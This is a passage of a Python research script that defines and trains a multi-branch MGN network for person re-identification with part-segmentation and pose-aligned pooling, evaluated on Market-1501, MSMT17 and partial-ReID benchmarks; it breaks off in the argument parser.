"file_name": "pyping.py", "file_ext": "py", "file_size_in_byte": 4374, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "tbtime.tbtime", "line_number": 8, "usage_type": "attribute"}, {"api_name": "configparser.ConfigParser", "line_number": 9, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 28, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 56, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 71, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 78, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 102, "usage_type": "call"}, {"api_name": "pyppeteer.launch", "line_number": 107, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 119, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 119, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 120, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 120, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 122, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 122, "usage_type": "attribute"}, {"api_name": "asyncio.sleep", "line_number": 125, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 128, "usage_type": "call"}, {"api_name": "asyncio.new_event_loop", "line_number": 132, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 146, "usage_type": "call"}]} +{"seq_id": "109324450", "text": "from __future__ import print_function\n\nimport argparse\nimport copy\nimport os\nimport os.path as osp\nimport time\nimport datetime\nimport sys\n\nimport numpy as np\nimport torch\nfrom scipy.spatial.distance import cdist\nfrom sklearn.preprocessing import normalize\nfrom torch import nn, optim\nfrom torch.utils.data import DataLoader\nfrom torchvision import transforms\nfrom torchvision.models.resnet import resnet50, Bottleneck\nfrom torchvision.transforms import functional\nimport torch.nn.functional as F\n\nfrom __init__ import cmc, mean_ap\nfrom market1501_erase_ps_label import Market1501, RandomIdSampler\nfrom msmt17_erase_ps_label import MSMT17\nfrom partial_reid import PartialREID\nfrom partial_ilids import PartialiLIDs\nfrom easy2hard_triplet import TripletSemihardLoss\nfrom random_erasing_w_ps_label import RandomErasingWithPS\nimport shutil\nfrom pa_pool import pa_max_pool\nfrom ps_head import *\nfrom ps_loss import PSLoss\nfrom np_distance import compute_dist_with_visibility\nfrom file_utils import load_pickle, save_pickle\n\n\nclass MGN(nn.Module):\n def __init__(self, num_classes, args, ps_n_classes):\n super(MGN, self).__init__()\n\n self.args = args\n resnet = resnet50(pretrained=False)\n res_path = os.path.dirname(os.path.realpath(__file__)) + '/resnet50-19c8e357.pth'\n resnet.load_state_dict(torch.load(res_path))\n\n # backbone\n self.backbone = nn.Sequential(\n resnet.conv1,\n resnet.bn1,\n resnet.relu,\n resnet.maxpool,\n resnet.layer1, # res_conv2\n resnet.layer2, # res_conv3\n resnet.layer3[0]# res_conv4_1\n )\n\n # res_conv4x\n res_conv4 = nn.Sequential(*resnet.layer3[1:])\n # res_conv5 global\n res_g_conv5 = resnet.layer4\n # res_conv5 part\n res_p_conv5 = nn.Sequential(\n Bottleneck(1024, 512, downsample=nn.Sequential(nn.Conv2d(1024, 2048, 1, bias=False), nn.BatchNorm2d(2048))),\n Bottleneck(2048, 512),\n Bottleneck(2048, 512))\n res_p_conv5.load_state_dict(resnet.layer4.state_dict())\n\n # mgn part-1 global\n self.p1 = nn.Sequential(copy.deepcopy(res_conv4), copy.deepcopy(res_g_conv5 if args.head_1part_stride == 2 else res_p_conv5))\n # mgn part-2\n self.p2 = nn.Sequential(copy.deepcopy(res_conv4), copy.deepcopy(res_p_conv5))\n # mgn part-3\n self.p3 = nn.Sequential(copy.deepcopy(res_conv4), copy.deepcopy(res_p_conv5))\n\n # global max pooling\n self.maxpool_zg_p1 = nn.MaxPool2d(kernel_size=(12, 4) if args.head_1part_stride == 2 else (24, 8))\n self.maxpool_zg_p2 = nn.MaxPool2d(kernel_size=(24, 8))\n self.maxpool_zg_p3 = nn.MaxPool2d(kernel_size=(24, 8))\n\n # conv1 reduce\n add_part_2048 = nn.Sequential(nn.BatchNorm1d(2048), nn.ReLU())\n self._init_add_part(add_part_2048)\n self.add_part_1 = copy.deepcopy(add_part_2048)\n self.add_part_2 = copy.deepcopy(add_part_2048)\n self.add_part_3 = copy.deepcopy(add_part_2048)\n\n \n reduction = nn.Sequential(nn.Conv2d(2048, 256, 1, bias=False), nn.BatchNorm2d(256), nn.ReLU())\n self._init_reduction(reduction)\n self.reduction_0 = copy.deepcopy(reduction)\n self.reduction_1 = copy.deepcopy(reduction)\n self.reduction_2 = copy.deepcopy(reduction)\n self.reduction_3 = copy.deepcopy(reduction)\n self.reduction_4 = copy.deepcopy(reduction)\n self.reduction_5 = copy.deepcopy(reduction)\n self.reduction_6 = copy.deepcopy(reduction)\n self.reduction_7 = copy.deepcopy(reduction)\n\n # fc softmax loss\n self.fc_id_2048_0_tmp = nn.Linear(2048, 2048)\n self.fc_id_2048_1_tmp = nn.Linear(2048, 2048)\n self.fc_id_2048_2_tmp = nn.Linear(2048, 2048)\n self.fc_id_2048_0 = nn.Linear(2048, num_classes)\n self.fc_id_2048_1 = nn.Linear(2048, num_classes)\n self.fc_id_2048_2 = nn.Linear(2048, num_classes)\n self.fc_id_256_1_0 = nn.Linear(256, num_classes)\n self.fc_id_256_1_1 = nn.Linear(256, num_classes)\n self.fc_id_256_2_0 = nn.Linear(256, num_classes)\n self.fc_id_256_2_1 = nn.Linear(256, num_classes)\n self.fc_id_256_2_2 = nn.Linear(256, num_classes)\n\n self._init_fc(self.fc_id_2048_0_tmp)\n self._init_fc(self.fc_id_2048_1_tmp)\n self._init_fc(self.fc_id_2048_2_tmp)\n self._init_fc(self.fc_id_2048_0)\n self._init_fc(self.fc_id_2048_1)\n self._init_fc(self.fc_id_2048_2)\n self._init_fc(self.fc_id_256_1_0)\n self._init_fc(self.fc_id_256_1_1)\n self._init_fc(self.fc_id_256_2_0)\n self._init_fc(self.fc_id_256_2_1)\n self._init_fc(self.fc_id_256_2_2)\n\n embedding = nn.Sequential(nn.Linear(256, 256))\n self.embedding_1 = copy.deepcopy(embedding)\n self.embedding_2 = copy.deepcopy(embedding)\n self.embedding_3 = copy.deepcopy(embedding)\n self._init_embedding(self.embedding_1)\n self._init_embedding(self.embedding_2)\n self._init_embedding(self.embedding_3)\n\n if args.src_ps_lw > 0 or args.cd_ps_lw > 0:\n ps_head_cls = eval(args.ps_head_arch)\n self.ps_head = ps_head_cls({'in_c': 2048, 'mid_c': 256, 'num_classes': ps_n_classes})\n print('Model Structure:')\n print(self)\n \n @staticmethod\n def _init_embedding(embedding):\n nn.init.normal_(embedding[0].weight, std=0.01)\n nn.init.constant_(embedding[0].bias, 0.)\n\n @staticmethod\n def _init_add_part(add_part):\n nn.init.normal_(add_part[0].weight, mean = 1.0, std=0.02)\n nn.init.constant_(add_part[0].bias, 0.)\n \n @staticmethod\n def _init_reduction(reduction):\n nn.init.kaiming_normal_(reduction[0].weight, mode='fan_in')\n nn.init.normal_(reduction[1].weight, mean = 1.0, std=0.02)\n nn.init.constant_(reduction[1].bias, 0.) \n\n @staticmethod\n def _init_fc(fc):\n nn.init.normal_(fc.weight, std=0.001)\n nn.init.constant_(fc.bias, 0.)\n\n def forward(self, in_dict):\n x = self.backbone(in_dict['im'])\n\n p1 = self.p1(x)\n p2 = self.p2(x)\n p3 = self.p3(x)\n\n if hasattr(self, 'ps_head'):\n ps1 = self.ps_head(p1)\n ps2 = self.ps_head(p2)\n ps3 = self.ps_head(p3)\n\n zg_p1 = self.maxpool_zg_p1(p1) # z_g^G\n zg_p2 = self.maxpool_zg_p2(p2) # z_g^P2\n zg_p3 = self.maxpool_zg_p3(p3) # z_g^P3\n\n if args.pap:\n pap_pooled = pa_max_pool({'feat': p2, 'pap_mask': in_dict['pap_mask_2p']})\n z0_p2, z1_p2 = pap_pooled['feat_list']\n part_2_1_v, part_2_2_v = pap_pooled['visible'][:, 0], pap_pooled['visible'][:, 1]\n else:\n zp2 = F.max_pool2d(p2, (12, 8))\n z0_p2 = zp2[:, :, 0:1, :] # z_p0^P2\n z1_p2 = zp2[:, :, 1:2, :] # z_p1^P2\n\n if args.pap:\n pap_pooled = pa_max_pool({'feat': p3, 'pap_mask': in_dict['pap_mask_3p']})\n z0_p3, z1_p3, z2_p3 = pap_pooled['feat_list']\n part_3_1_v, part_3_2_v, part_3_3_v = pap_pooled['visible'][:, 0], pap_pooled['visible'][:, 1], pap_pooled['visible'][:, 2]\n else:\n zp3 = F.max_pool2d(p3, (8, 8))\n z0_p3 = zp3[:, :, 0:1, :] # z_p0^P3\n z1_p3 = zp3[:, :, 1:2, :] # z_p1^P3\n z2_p3 = zp3[:, :, 2:3, :] # z_p2^P3\n \n fg_p1 = self.reduction_0(zg_p1).squeeze(dim=3).squeeze(dim=2) # f_g^G, L_triplet^G\n fg_p2 = self.reduction_1(zg_p2).squeeze(dim=3).squeeze(dim=2) # f_g^P2, L_triplet^P2\n fg_p3 = self.reduction_2(zg_p3).squeeze(dim=3).squeeze(dim=2) # f_g^P3, L_triplet^P3\n f0_p2 = self.reduction_3(z0_p2).squeeze(dim=3).squeeze(dim=2) # f_p0^P2\n f1_p2 = self.reduction_4(z1_p2).squeeze(dim=3).squeeze(dim=2) # f_p1^P2\n f0_p3 = self.reduction_5(z0_p3).squeeze(dim=3).squeeze(dim=2) # f_p0^P3\n f1_p3 = self.reduction_6(z1_p3).squeeze(dim=3).squeeze(dim=2) # f_p1^P3\n f2_p3 = self.reduction_7(z2_p3).squeeze(dim=3).squeeze(dim=2) # f_p2^P3\n \n fg_p1 = self.embedding_1(fg_p1)\n fg_p2 = self.embedding_2(fg_p2)\n fg_p3 = self.embedding_3(fg_p3)\n\n l_p1 = self.fc_id_2048_0_tmp(zg_p1.squeeze(dim=3).squeeze(dim=2)) # L_softmax^G\n l_p2 = self.fc_id_2048_1_tmp(zg_p2.squeeze(dim=3).squeeze(dim=2)) # L_softmax^P2\n l_p3 = self.fc_id_2048_2_tmp(zg_p3.squeeze(dim=3).squeeze(dim=2)) # L_softmax^P3\n \n l_p1 = self.add_part_1(l_p1)\n l_p2 = self.add_part_2(l_p2)\n l_p3 = self.add_part_3(l_p3)\n\n l_p1 = self.fc_id_2048_0(l_p1) # L_softmax^G\n l_p2 = self.fc_id_2048_1(l_p2) # L_softmax^P2\n l_p3 = self.fc_id_2048_2(l_p3) # L_softmax^P3\n\n l0_p2 = self.fc_id_256_1_0(f0_p2) # L_softmax0^P2\n l1_p2 = self.fc_id_256_1_1(f1_p2) # L_softmax1^P2\n l0_p3 = self.fc_id_256_2_0(f0_p3) # L_softmax0^P3\n l1_p3 = self.fc_id_256_2_1(f1_p3) # L_softmax1^P3\n l2_p3 = self.fc_id_256_2_2(f2_p3) # L_softmax2^P3\n \n predict_1 = torch.cat([0.8*f0_p2, f1_p2, 0.7*f0_p3, f1_p3, 0.7*f2_p3], dim=1)\n predict_2 = torch.cat([fg_p1, fg_p2, fg_p3, f0_p2, f1_p2, f0_p3, f1_p3, f2_p3], dim=1) #67575\n if hasattr(self, 'ps_head') and args.pap:\n return predict_1, predict_2, fg_p1, fg_p2, fg_p3, l_p1, l_p2, l_p3, l0_p2, l1_p2, l0_p3, l1_p3, l2_p3, part_2_1_v, part_2_2_v, part_3_1_v, part_3_2_v, part_3_3_v, ps1, ps2, ps3\n elif hasattr(self, 'ps_head') and not args.pap:\n return predict_1, predict_2, fg_p1, fg_p2, fg_p3, l_p1, l_p2, l_p3, l0_p2, l1_p2, l0_p3, l1_p3, l2_p3, ps1, ps2, ps3\n elif not hasattr(self, 'ps_head') and args.pap:\n return predict_1, predict_2, fg_p1, fg_p2, fg_p3, l_p1, l_p2, l_p3, l0_p2, l1_p2, l0_p3, l1_p3, l2_p3, part_2_1_v, part_2_2_v, part_3_1_v, part_3_2_v, part_3_3_v\n else:\n return predict_1, predict_2, fg_p1, fg_p2, fg_p3, l_p1, l_p2, l_p3, l0_p2, l1_p2, l0_p3, l1_p3, l2_p3\n\ndef save_model(model, filename):\n state = model.module.state_dict() if hasattr(model, 'module') else model.state_dict()\n for key in state: \n state[key] = state[key].clone().cpu()\n if not os.path.exists(os.path.dirname(filename)):\n os.makedirs(os.path.dirname(filename))\n torch.save(state, filename)\n\ndef load_model_weight(model, model_weight_file):\n assert osp.exists(model_weight_file), \"model_weight_file {} does not exist!\".format(model_weight_file)\n assert osp.isfile(model_weight_file), \"model_weight_file {} is not file!\".format(model_weight_file)\n model_weight = torch.load(model_weight_file, map_location=(lambda storage, loc: storage))\n model.load_state_dict(model_weight)\n msg = '=> Loaded model_weight from {}'.format(model_weight_file)\n print(msg)\n\ndef get_dataset_root(name):\n if name == 'market1501':\n root = 'Market-1501-v15.09.15'\n elif name == 'cuhk03':\n root = 'cuhk03-np-jpg/detected'\n elif name == 'duke':\n root = 'DukeMTMC-reID'\n else:\n raise ValueError\n return root\n\n\nclass InfiniteNextBatch(object):\n def __init__(self, loader):\n self.loader = loader\n self.reset()\n\n def reset(self):\n self.loader_iter = iter(self.loader)\n\n def next_batch(self):\n try:\n batch = self.loader_iter.next()\n except StopIteration:\n self.reset()\n batch = self.loader_iter.next()\n return batch\n\n\ndef get_next_batch(loader):\n try:\n batch = loader.next()\n except StopIteration:\n batch = loader.next()\n return batch\n\n\ndef run(args):\n gpuId, epochs, weight_decay, batch_id, batch_image, lr_1, lr_2, erasing_p, sampling, exp_dir, trainset_name, cd_trainset_name, testset_names, rand_crop, head_1part_stride = \\\n args.gpuId, args.epochs, args.weight_decay, args.batch_id, args.batch_image, args.lr_1, args.lr_2, args.erasing_p, args.sampling, args.exp_dir, args.trainset_name, args.cd_trainset_name, args.testset_names, args.rand_crop, args.head_1part_stride\n\n DEVICE = torch.device(\"cuda:\" + gpuId if torch.cuda.is_available() else \"cpu\")\n print(DEVICE)\n num_workers = 4\n\n batch_test = 64 #32\n\n train_list = [transforms.Resize((400, 144)), transforms.RandomCrop((384, 128))] if rand_crop else [transforms.Resize((384, 128))]\n train_list += [\n transforms.ToTensor(),\n ]\n re_obj = RandomErasingWithPS(probability=erasing_p, mean=[0.0, 0.0, 0.0]) ####\n train_list += [transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])]\n train_transform = transforms.Compose(train_list)\n\n if args.ps_head_arch in ['PartSegHeadConv', 'PartSegHeadConvConv']:\n ps_w_h = (8, 24)\n elif args.ps_head_arch in ['PartSegHeadDeconvConv']:\n ps_w_h = (16, 48)\n elif args.ps_head_arch in ['PartSegHeadDeconvDeconvConv']:\n ps_w_h = (32, 96)\n else:\n raise ValueError('Invalid ps_head_arch: {}'.format(args.ps_head_arch))\n\n if args.ps_fuse_type == 'None':\n ps_n_classes = 8\n elif args.ps_fuse_type == '4parts':\n ps_n_classes = 5\n elif args.ps_fuse_type == '2parts':\n ps_n_classes = 3\n elif args.ps_fuse_type == 'fg':\n ps_n_classes = 2\n else:\n raise ValueError('Invalid ps_fuse_type: {}'.format(args.ps_fuse_type))\n\n if trainset_name in ['market1501', 'cuhk03', 'duke']:\n root = get_dataset_root(trainset_name)\n if args.src_ps_lw > 0:\n if trainset_name == 'cuhk03':\n ps_dir = root.replace('cuhk03-np-jpg', 'cuhk03-np-jpg_ps_label')\n else:\n ps_dir = root + '_ps_label'\n if args.ps_label_root != 'None':\n ps_dir = args.ps_label_root\n else:\n ps_dir = None\n train_dataset = Market1501(\n root + '/bounding_box_train',\n transform=train_transform,\n training=True,\n kpt_file=trainset_name+'-kpt.pkl' if args.pap else None,\n ps_dir=ps_dir,\n re_obj=re_obj,\n ps_w_h=ps_w_h,\n ps_fuse_type=args.ps_fuse_type,\n )\n elif trainset_name in ['msmt17']:\n ps_dir = 'msmt17/MSMT17_V1_ps_label'\n if args.ps_label_root != 'None':\n ps_dir = args.ps_label_root\n train_dataset = MSMT17(\n transform=train_transform,\n training=True,\n use_kpt=args.pap,\n ps_dir=ps_dir,\n split='train',\n re_obj=re_obj,\n ps_w_h=ps_w_h,\n ps_fuse_type=args.ps_fuse_type,\n )\n else:\n raise ValueError('Invalid train set {}'.format(trainset_name))\n train_loader = DataLoader(train_dataset,\n sampler=RandomIdSampler(train_dataset, batch_image=batch_image),\n batch_size=batch_id * batch_image,\n num_workers=num_workers, drop_last=True)\n \n # TODO: consider erase ps label\n # TODO: ps_dir, and args.ps_label_root for cd_train\n if args.cd_ps_lw > 0:\n if cd_trainset_name in ['market1501', 'cuhk03', 'duke']:\n cd_train_dataset = Market1501(get_dataset_root(cd_trainset_name) + '/bounding_box_train', transform=train_transform, training=True, kpt_file=None, ps_dir=cd_trainset_name + '-ps')\n elif cd_trainset_name in ['msmt17']:\n cd_train_dataset = MSMT17(transform=train_transform, training=True, use_kpt=False, use_ps=True)\n else:\n raise ValueError('Invalid cd train set {}'.format(cd_trainset_name))\n cd_train_loader = InfiniteNextBatch(DataLoader(cd_train_dataset,\n batch_size=args.cd_train_batch_size,\n num_workers=num_workers, drop_last=True))\n\n test_transform = transforms.Compose([\n transforms.Resize((384, 128)),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n ])\n test_flip_transform = transforms.Compose([\n transforms.Resize((384, 128)),\n functional.hflip,\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n ])\n\n def make_test_loader_M_C_D(root, name):\n query_dataset = Market1501(root + '/query', transform=test_transform, training=False, kpt_file=name+'-kpt.pkl' if args.pap else None)\n query_flip_dataset = Market1501(root + '/query', transform=test_flip_transform, training=False, kpt_file=name+'-kpt.pkl' if args.pap else None)\n query_loader = DataLoader(query_dataset, batch_size=batch_test, num_workers=num_workers)\n query_flip_loader = DataLoader(query_flip_dataset, batch_size=batch_test, num_workers=num_workers)\n\n test_dataset = Market1501(root + '/bounding_box_test', transform=test_transform, training=False, kpt_file=name+'-kpt.pkl' if args.pap else None)\n test_flip_dataset = Market1501(root + '/bounding_box_test', transform=test_flip_transform, training=False, kpt_file=name+'-kpt.pkl' if args.pap else None)\n test_loader = DataLoader(test_dataset, batch_size=batch_test, num_workers=num_workers)\n test_flip_loader = DataLoader(test_flip_dataset, batch_size=batch_test, num_workers=num_workers)\n return query_loader, query_flip_loader, test_loader, test_flip_loader\n\n def make_test_loader_MS_PR_PI(name):\n ps_kwargs = {'use_ps': False}\n if name == 'msmt17':\n dclass = MSMT17\n ps_kwargs = {'ps_dir': 'msmt17/MSMT17_V1_ps_label'}\n elif name == 'partial_reid':\n dclass = PartialREID\n elif name == 'partial_ilids':\n dclass = PartialiLIDs\n else:\n raise ValueError('Invalid dataset name {}'.format(name))\n q_set = dclass(transform=test_transform, training=False, use_kpt=args.pap, split='query', **ps_kwargs)\n q_flip_set = dclass(transform=test_flip_transform, training=False, use_kpt=args.pap, split='query', **ps_kwargs)\n q_loader = DataLoader(q_set, batch_size=batch_test, num_workers=num_workers)\n q_flip_loader = DataLoader(q_flip_set, batch_size=batch_test, num_workers=num_workers)\n\n g_set = dclass(transform=test_transform, training=False, use_kpt=args.pap, split='gallery', **ps_kwargs)\n g_flip_set = dclass(transform=test_flip_transform, training=False, use_kpt=args.pap, split='gallery', **ps_kwargs)\n g_loader = DataLoader(g_set, batch_size=batch_test, num_workers=num_workers)\n g_flip_loader = DataLoader(g_flip_set, batch_size=batch_test, num_workers=num_workers)\n\n return q_loader, q_flip_loader, g_loader, g_flip_loader\n\n def make_test_loader(name):\n if name in ['market1501', 'cuhk03', 'duke']:\n return make_test_loader_M_C_D(get_dataset_root(name), name)\n elif name in ['msmt17', 'partial_reid', 'partial_ilids']:\n return make_test_loader_MS_PR_PI(name)\n\n test_loaders = [make_test_loader(name) for name in testset_names]\n\n mgn = MGN(len(train_dataset.unique_ids), args, ps_n_classes)\n if torch.cuda.device_count() > 1:\n mgn = nn.DataParallel(mgn)\n mgn = mgn.to(DEVICE)\n vanilla_cross_entropy_loss = nn.CrossEntropyLoss()\n cross_entropy_loss = nn.CrossEntropyLoss(reduce=False)\n triplet_semihard_loss = TripletSemihardLoss(margin=0.1, DEVICE = DEVICE, sampling = sampling, batch_id = batch_id, batch_image = batch_image) #batch_hard, .'curriculum'\n ps_loss = PSLoss()\n\n optimizer_start1 = optim.SGD(mgn.parameters(), lr=lr_1, momentum=0.9, weight_decay=weight_decay)\n optimizer_start2 = optim.SGD(mgn.parameters(), lr=lr_2, momentum=0.9, weight_decay=weight_decay)\n scheduler_1 = optim.lr_scheduler.MultiStepLR(optimizer_start1, [140, 180], gamma=0.1)\n scheduler_2 = optim.lr_scheduler.MultiStepLR(optimizer_start2, [140, 180], gamma=0.1) # best [140, 180] [120, 160]\n\n def get_model_input(inputs, target):\n dic = {'im': inputs.to(DEVICE)}\n if 'pap_mask_2p' in target:\n dic['pap_mask_2p'] = target['pap_mask_2p'].to(DEVICE)\n dic['pap_mask_3p'] = target['pap_mask_3p'].to(DEVICE)\n return dic\n\n def extract_loader_feat(loader, verbose=False):\n feat = []\n vis = []\n i = 0\n for inputs, target in loader:\n if verbose:\n print(i)\n i += 1\n with torch.no_grad():\n output = mgn(get_model_input(inputs, target))\n feat.append(output[1].detach().cpu().numpy())\n if args.pap:\n vis_ = np.concatenate([np.ones([len(output[1]), 3]), torch.stack(output[5+3+5:5+3+5+5], 1).detach().cpu().numpy()], 1)\n vis.append(vis_)\n feat = np.concatenate(feat)\n vis = np.concatenate(vis) if args.pap else None\n return feat, vis\n\n def test(query_loader, query_flip_loader, test_loader, test_flip_loader, trainset_name, testset_name, epoch, verbose=False):\n cache_file = '{}/feat_cache-{}_to_{}.pkl'.format(exp_dir, trainset_name, testset_name)\n if args.use_feat_cache:\n assert os.path.exists(cache_file), \"Feature cache file {} does not exist!\".format(cache_file)\n query_2, q_vis, query_flip_2, q_vis, test_2, test_vis, test_flip_2, test_vis, q_ids, q_cams, g_ids, g_cams = load_pickle(cache_file)\n else:\n query_2, q_vis = extract_loader_feat(query_loader, verbose=verbose)\n query_flip_2, q_vis = extract_loader_feat(query_flip_loader, verbose=verbose)\n\n test_2, test_vis = extract_loader_feat(test_loader, verbose=verbose)\n test_flip_2, test_vis = extract_loader_feat(test_flip_loader, verbose=verbose)\n\n q_ids = query_loader.dataset.ids\n q_cams = query_loader.dataset.cameras\n g_ids = test_loader.dataset.ids\n g_cams = test_loader.dataset.cameras\n save_pickle([query_2, q_vis, query_flip_2, q_vis, test_2, test_vis, test_flip_2, test_vis, q_ids, q_cams, g_ids, g_cams], cache_file)\n\n if args.test_which_feat > 0:\n # TODO: implement for pap\n idx = args.test_which_feat\n query_2 = query_2[:, 256*idx-256:256*idx]\n query_flip_2 = query_flip_2[:, 256*idx-256:256*idx]\n test_2 = test_2[:, 256*idx-256:256*idx]\n test_flip_2 = test_flip_2[:, 256*idx-256:256*idx]\n\n query = normalize(query_2 + query_flip_2)\n test = normalize(test_2 + test_flip_2)\n\n if verbose:\n print('query.shape:', query.shape)\n print('test.shape:', test.shape)\n if args.pap:\n print('q_vis.shape:', q_vis.shape)\n print('test_vis.shape:', test_vis.shape)\n\n if args.pap:\n dist_1 = compute_dist_with_visibility(query, test, q_vis, test_vis, dist_type='euclidean', avg_by_vis_num=False)\n else:\n dist_1 = cdist(query, test)\n r_1 = cmc(dist_1, q_ids, g_ids, q_cams, g_cams,\n separate_camera_set=False,\n single_gallery_shot=False,\n first_match_break=True)\n m_ap_1 = mean_ap(dist_1, q_ids, g_ids, q_cams, g_cams)\n print('EPOCH [%d] %s -> %s: mAP=%f, r@1=%f, r@3=%f, r@5=%f, r@10=%f' % (epoch + 1, trainset_name, testset_name, m_ap_1, r_1[0], r_1[2], r_1[4], r_1[9]))\n\n if args.only_test:\n mgn.eval()\n if not args.use_feat_cache:\n if args.model_weight_file:\n model_weight_file = args.model_weight_file\n else:\n model_weight_file = '{}/model_weight.pth'.format(exp_dir)\n load_model_weight((mgn.module if hasattr(mgn, 'module') else mgn), model_weight_file)\n for name, test_loader in zip(testset_names, test_loaders):\n test(test_loader[0], test_loader[1], test_loader[2], test_loader[3], trainset_name, name, -1, verbose=False)\n exit()\n\n for epoch in range(epochs):\n mgn.train()\n scheduler_1.step()\n scheduler_2.step()\n running_loss = 0.0\n running_loss_1 = 0.0\n running_loss_2 = 0.0\n if epoch < 20:\n optimizer_1 = optim.SGD(mgn.parameters(), lr=0.01+0.0045*epoch, momentum=0.9, weight_decay=weight_decay)\n optimizer_2 = optim.SGD(mgn.parameters(), lr=0.001+0.00045*epoch, momentum=0.9, weight_decay=weight_decay) \n else:\n optimizer_1 = optimizer_start1\n optimizer_2 = optimizer_start2\n \n for i, data in enumerate(train_loader):\n inputs, target = data\n inputs = inputs.to(DEVICE)\n for k, v in target.items():\n target[k] = v.to(DEVICE)\n labels = target['id']\n outputs = mgn(get_model_input(inputs, target))\n optimizer_1.zero_grad()\n if args.pap:\n losses_1 = [vanilla_cross_entropy_loss(output, labels) for output in outputs[5:5+3]] + [(cross_entropy_loss(output, labels) * v).sum() / (v.sum() + 1e-12) for output, v in zip(outputs[5+3:5+3+5], outputs[5+3+5:5+3+5+5])]\n else:\n losses_1 = [vanilla_cross_entropy_loss(output, labels) for output in outputs[5:5+8]]\n loss_1 = sum(losses_1) / len(losses_1)\n psl = 0\n if args.src_ps_lw > 0:\n psl = (ps_loss(outputs[-3], target['ps_label']) + ps_loss(outputs[-2], target['ps_label']) + ps_loss(outputs[-1], target['ps_label'])) / 3.\n (loss_1 + psl * args.src_ps_lw).backward()\n if args.cd_ps_lw > 0:\n cd_inputs, cd_targets = cd_train_loader.next_batch()\n cd_inputs = cd_inputs.to(DEVICE)\n for k, v in cd_targets.items():\n cd_targets[k] = v.to(DEVICE)\n pap_old = args.pap\n args.pap = False\n outputs = mgn(get_model_input(cd_inputs, cd_targets))\n args.pap = pap_old\n cd_psl = (ps_loss(outputs[-3], cd_targets['ps_label']) + ps_loss(outputs[-2], cd_targets['ps_label']) + ps_loss(outputs[-1], cd_targets['ps_label'])) / 3.\n (cd_psl * args.cd_ps_lw).backward()\n optimizer_1.step()\n\n outputs = mgn(get_model_input(inputs, target))\n optimizer_2.zero_grad()\n losses_2 = [triplet_semihard_loss(output, labels, epoch) for output in outputs[2:5]]\n loss_2 = sum(losses_2) / len(losses_2)\n psl = 0\n if args.src_ps_lw > 0:\n psl = (ps_loss(outputs[-3], target['ps_label']) + ps_loss(outputs[-2], target['ps_label']) + ps_loss(outputs[-1], target['ps_label'])) / 3.\n (loss_2 + psl * args.src_ps_lw).backward()\n if args.cd_ps_lw > 0:\n cd_inputs, cd_targets = cd_train_loader.next_batch()\n cd_inputs = cd_inputs.to(DEVICE)\n for k, v in cd_targets.items():\n cd_targets[k] = v.to(DEVICE)\n pap_old = args.pap\n args.pap = False\n outputs = mgn(get_model_input(cd_inputs, cd_targets))\n args.pap = pap_old\n cd_psl = (ps_loss(outputs[-3], cd_targets['ps_label']) + ps_loss(outputs[-2], cd_targets['ps_label']) + ps_loss(outputs[-1], cd_targets['ps_label'])) / 3.\n (cd_psl * args.cd_ps_lw).backward()\n optimizer_2.step()\n\n running_loss_1 += loss_1.item()\n running_loss_2 += loss_2.item()\n running_loss = running_loss + (loss_1.item() + loss_2.item())/2.0\n\n print('%d/%d - %d/%d - loss: %f - ps_loss: %f - cd_ps_loss: %f' % (epoch + 1, epochs, i, len(train_loader), (loss_1.item() + loss_2.item())/2, psl.item() if isinstance(psl, torch.Tensor) else 0, cd_psl.item() if args.cd_ps_lw > 0 else 0))\n print('epoch: %d/%d - loss1: %f' % (epoch + 1, epochs, running_loss_1 / len(train_loader)))\n print('epoch: %d/%d - loss2: %f' % (epoch + 1, epochs, running_loss_2 / len(train_loader)))\n\n # if (epoch + 1) % 50 == 0:\n # model_weight_file = '{}/model_weight.pth'.format(exp_dir)\n # save_model(mgn, model_weight_file)\n # mgn.eval()\n # for name, test_loader in zip(testset_names, test_loaders):\n # test(test_loader[0], test_loader[1], test_loader[2], test_loader[3], trainset_name, name, epoch)\n model_weight_file = '{}/model_weight.pth'.format(exp_dir)\n save_model(mgn, model_weight_file)\n mgn.eval()\n for name, test_loader in zip(testset_names, test_loaders):\n test(test_loader[0], test_loader[1], test_loader[2], test_loader[3], trainset_name, name, epoch)\n\n\nclass CommaSeparatedSeq(object):\n def __init__(self, seq_class=tuple, func=int):\n self.seq_class = seq_class\n self.func = func\n\n def __call__(self, s):\n return self.seq_class([self.func(i) for i in s.split(',')])\n\n\ndef str2bool(v):\n \"\"\"From https://github.com/amdegroot/ssd.pytorch\"\"\"\n return v.lower() in (\"yes\", \"true\", \"t\", \"1\")\n\n\nif __name__ == '__main__':\n print('Used Python:', sys.executable)\n parser = argparse.ArgumentParser()\n parser.add_argument('-i', '--gpuId', type=str, default='0', help='input gpu id')\n parser.add_argument('-e', '--epochs', type=int, default=200, help='input training epochs')\n parser.add_argument('-w', '--weight_decay', type=float, default=5e-4)\n parser.add_argument('--batch_id', type=int, default=2)\n parser.add_argument('--batch_image', type=int, default=4)\n parser.add_argument('--lr_1', type=float, default = .1)\n parser.add_argument('--lr_2', type=float, default = .01)\n parser.add_argument('--rand_crop', type=eval, default=True, help='Either True or False')\n parser.add_argument('--erasing_p', type=float, default = 0.5)\n parser.add_argument('--sampling', type=str, default = 'batch_hard')\n parser.add_argument('--exp_dir', type=str)\n parser.add_argument('--trainset_name', type=str)\n parser.add_argument('--cd_trainset_name', type=str)\n parser.add_argument('--cd_train_batch_size', type=int, default=16*8)\n parser.add_argument('--head_1part_stride', type=int, default=2)\n parser.add_argument('--pap', 